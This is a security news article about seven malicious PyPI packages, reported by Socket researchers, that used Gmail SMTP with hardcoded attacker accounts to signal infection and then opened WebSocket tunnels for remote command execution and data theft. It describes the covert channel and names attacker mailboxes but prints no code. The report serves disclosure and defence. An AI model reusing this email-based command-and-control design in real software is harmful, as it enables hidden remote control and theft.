Seven Malicious Packages Exploit Gmail SMTP to Run Harmful Commands

A major supply chain security incident has rocked the Python open-source community as researchers at Socket’s Threat Research Team uncovered seven interconnected malicious packages published on the Python Package Index (PyPI).

These packages Coffin-Codes-Pro, Coffin-Codes-NET2, Coffin-Codes-NET, Coffin-Codes-2022, Coffin2022, Coffin-Grave, and cfc-bsb-were ingeniously designed to exploit Gmail’s SMTP service, establishing covert command-and-control tunnels and enabling attackers to execute arbitrary commands on compromised machines.

Sophisticated Abuse of Gmail’s SMTP

What sets these packages apart from the typical malware found on PyPI is their reliance on Gmail’s Simple Mail Transfer Protocol (SMTP) for communication.

- Advertisement -

This allows the traffic generated by the malware to blend in as legitimate email traffic, sidestepping most firewall and endpoint detection systems that inherently trust Gmail’s infrastructure.

Below is a structured table summarizing each of the seven malicious Python packages uncovered, the email addresses and SMTP accounts used, key code behaviors, and notable technical details from the investigation. Redacted credentials are marked for safety.

According to the Socket Findings, upon installation, the packages establish SSL-encrypted connections to Gmail servers using hardcoded credentials tied to attacker-controlled accounts (notably sphacoffin@gmail.com and others).

Initial messages are sent to another attacker mailbox, blockchain.bitcoins2020@gmail.com, as a confirmation that the malicious implant is active.

The core functionality centers on setting up a clandestine tunnel. After the initial beacon, the malicious modules open a secure WebSocket channel to receive further instructions. The attacker can then leverage this tunnel to:

• Exfiltrate sensitive data
• Execute arbitrary shell commands or scripts
• Harvest credentials or access admin panels
• Transfer files in and out of victim networks
• Pivot further into internal networks
• Package Details and Timeline

Each package had slight variations:

• Coffin-Codes-Pro: Established the initial attack pattern, signaling the implant and forwarding tunnel information to the attacker.
• Coffin-Codes-NET2 & Coffin-Codes-NET: Employed new Gmail accounts and minor code changes, illustrating the attacker’s persistent efforts.
• Coffin-Codes-2022, Coffin2022, Coffin-Grave: Functionally mirrored the original package, with reused credentials and workflow across different PyPI entries.
• cfc-bsb: The oldest and least overtly malicious, dating to March 2021. While it lacked direct email exfiltration, it still facilitated tunnel-forwarding and posed significant risks.

The only clues to the attacker’s identity are the handful of Gmail addresses used and the recurring Bitcoin and Solana-related references, suggesting possible ties to prior crypto-targeted attacks.

The packages have since been removed from PyPI, but their extended presence-dating as far back as 2021-underscores the difficulty of policing open-source repositories.

As open-source supply chain attacks become more stealthy and creative, awareness and vigilance must rise across the software development lifecycle.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!